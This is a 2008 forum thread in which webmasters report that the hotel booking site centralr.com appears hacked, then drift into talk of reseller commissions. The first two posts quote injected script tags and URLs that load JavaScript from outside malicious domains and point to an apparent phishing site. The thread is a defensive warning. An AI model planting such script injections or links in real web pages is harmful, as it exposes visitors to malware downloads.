Irish SEO,  Marketing & Webmaster Discussion

 

CentralR.com hacked?

This is a discussion on CentralR.com hacked? within the General Chat forums, part of the Lounge category; seems like centralr.com are serving up some unexpected JS files on their online hotel booking forms today - usualy included ...


Go Back   Irish SEO, Marketing & Webmaster Discussion > Lounge > General Chat

Register Forum Rules FAQDonate Calendar Search Today's Posts Mark Forums Read



Reply

 

LinkBack Thread Tools Display Modes
  #1 (permalink)  
Old 16-07-2008, 03:38 PM
Coder
 
Join Date: Dec 2006
Location: Ireland
Posts: 38
Nominated 0 Times in 0 Posts
TOTW/F/M Award(s): 0
Thanks: 0
Thanked 0 Times in 0 Posts
webdream will become famous soon enough
Send a message via Skype™ to webdream
Default CentralR.com hacked?

seems like centralr.com are serving up some unexpected JS files on their online hotel booking forms today - usualy included as IFRAMES on the hotel websites:

<script src=http://www.gbradde.tk/ngg.js></script><script src=http://www.brcporb.ru/ngg.js></script>

Their own website also seems to have some strange page tiltles:

http://centralr.com/select_a_room.asp


<title>centralr.com - Hotel Reservations<script src=http://www.gbradde.tk/ngg.js></script><script src=http://www.brcporb.ru/ngg.js></script></title>

Anyone without good AV might be getting a malicious tool downloaded - at least thats what norton says.
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!Spurl this Post!Reddit! Wong this Post!
Reply With Quote
  #2 (permalink)  
Old 16-07-2008, 04:30 PM
Coder
 
Join Date: Dec 2006
Location: Ireland
Posts: 38
Nominated 0 Times in 0 Posts
TOTW/F/M Award(s): 0
Thanks: 0
Thanked 0 Times in 0 Posts
webdream will become famous soon enough
Send a message via Skype™ to webdream
Default

looks like this js file, http://www.brcporb.ru/ngg.js writes iframes calling a script from here

http://cdrpoex.com/cgi-bin/index.cgi?ad

The site at cdrpoex.com says it offers money transfer services, but looks a bit phishy to me. Don't think i'll be transfering any funds through them

http://whois.domaintools.com/cdrpoex.com
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!Spurl this Post!Reddit! Wong this Post!
Reply With Quote
  #3 (permalink)  
Old 16-07-2008, 04:40 PM
Hardcore Geek
 
Join Date: Aug 2006
Location: Dublin
Posts: 1,074
Nominated 0 Times in 0 Posts
TOTW/F/M Award(s): 0
Thanks: 0
Thanked 0 Times in 0 Posts
Gavin has a spectacular aura about
Default

Ah fiddle sticks, that's all I need.

Is it just me or is the site totally down?
__________________

Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!Spurl this Post!Reddit! Wong this Post!
Reply With Quote
  #4 (permalink)  
Old 16-07-2008, 05:06 PM
Coder
 
Join Date: Dec 2006
Location: Ireland
Posts: 38
Nominated 0 Times in 0 Posts
TOTW/F/M Award(s): 0
Thanks: 0
Thanked 0 Times in 0 Posts
webdream will become famous soon enough
Send a message via Skype™ to webdream
Default

looks like they took the entire site offline.

just reading through the reseller agreement from bookassist.... hmmm
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!Spurl this Post!Reddit! Wong this Post!
Reply With Quote
  #5 (permalink)  
Old 16-07-2008, 05:12 PM
Hardcore Geek
 
Join Date: Aug 2006
Location: Dublin
Posts: 1,074
Nominated 0 Times in 0 Posts
TOTW/F/M Award(s): 0
Thanks: 0
Thanked 0 Times in 0 Posts
Gavin has a spectacular aura about
Default

I started with bookasist bit didn't really take it anywhere. Any other programs out there that you know about?
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!Spurl this Post!Reddit! Wong this Post!
Reply With Quote
  #6 (permalink)  
Old 16-07-2008, 05:23 PM
Coder
 
Join Date: Dec 2006
Location: Ireland
Posts: 38
Nominated 0 Times in 0 Posts
TOTW/F/M Award(s): 0
Thanks: 0
Thanked 0 Times in 0 Posts
webdream will become famous soon enough
Send a message via Skype™ to webdream
Default

they used to pay a better finders fee is all i know.

whatever a hotel is using is fine with me - just get the job done and get paid is my motto.

mind you, if a hotel can be swayed to change booking engine, go for the one paying the biggest reseller commision.
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!Spurl this Post!Reddit! Wong this Post!
Reply With Quote
Reply

Tags
centralrcom, hacked

Thread Tools
Display Modes

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off
Trackbacks are On
Pingbacks are On
Refbacks are On


Similar Threads

Thread Thread Starter Forum Replies Last Post
My Pay Pal hacked - how?? EdenWeb General Chat 7 23-12-2007 11:54 AM
MattCutts Blog hacked paul Blogs & Blogging 4 03-04-2007 05:15 PM
Want to front page Digg and Slashdot? Get hacked. gary.b Webmaster Discussion 6 17-01-2007 04:31 PM


Sponsored links

Pepperjam Network
Paid On Results www.zanox.com Get Chitika Premium


All times are GMT +1. The time now is 12:53 PM.


Powered by: vBulletin Version 3.8.4, Copyright ©2000 - 2010, Jelsoft Enterprises Limited.
Hosted in Ireland by Blacknight - Test your ISP |Irish Hosting Directory| Armchair.ie|Logo by Eden Web Design|Avatars by Afterglow |Latest Blog Entries | VPS HostingAd Management by RedTyger

Search Engine Friendly URLs by vBSEO 3.3.2

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64